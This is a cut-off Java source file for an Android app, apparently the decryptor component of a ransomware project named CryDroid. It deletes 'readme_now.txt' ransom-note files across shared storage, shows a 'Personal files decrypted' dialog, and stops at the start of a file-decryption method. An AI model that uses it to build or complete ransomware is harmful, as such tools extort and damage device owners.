package com.crydroid;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import java.security.spec.KeySpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import android.app.AlertDialog;
import android.content.pm.PackageManager;
import android.app.Activity;
import android.support.v4.app.ActivityCompat;
import android.support.v4.content.ContextCompat;
import java.io.File;
import android.annotation.SuppressLint;
import android.os.Bundle;
import android.os.StrictMode;
import org.apache.commons.io.FilenameUtils;
import java.util.List;
import org.apache.commons.io.FileUtils;
import org.apache.commons.io.filefilter.TrueFileFilter;

@SuppressLint("NewApi")
public class MainActivity extends Activity
  {
@Override
protected void onCreate(Bundle savedInstanceState)
{
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    StrictMode.ThreadPolicy policy=new StrictMode.ThreadPolicy.Builder().permitAll().build();
    StrictMode.setThreadPolicy(policy);

        try {
checkperm();
        } catch (Exception e) {
        }
}


public void deletemessage() throws Exception  {

for (File f : new File("/storage/emulated/0").listFiles()) {
    if (f.isDirectory()) {
String path1 = f.getCanonicalPath();

File readme = new File("/"+path1+"/readme_now.txt");
readme.delete();

    }
}


}

private AlertDialog alert;
 
private void dialog_message() {
    AlertDialog.Builder builder = new AlertDialog.Builder(this);
    builder.setTitle("Unlocked");
    builder.setMessage("Personal files decrypted");
    alert = builder.create();
    alert.show();
}

public static void FileDecryption(String path1) throws Exception {




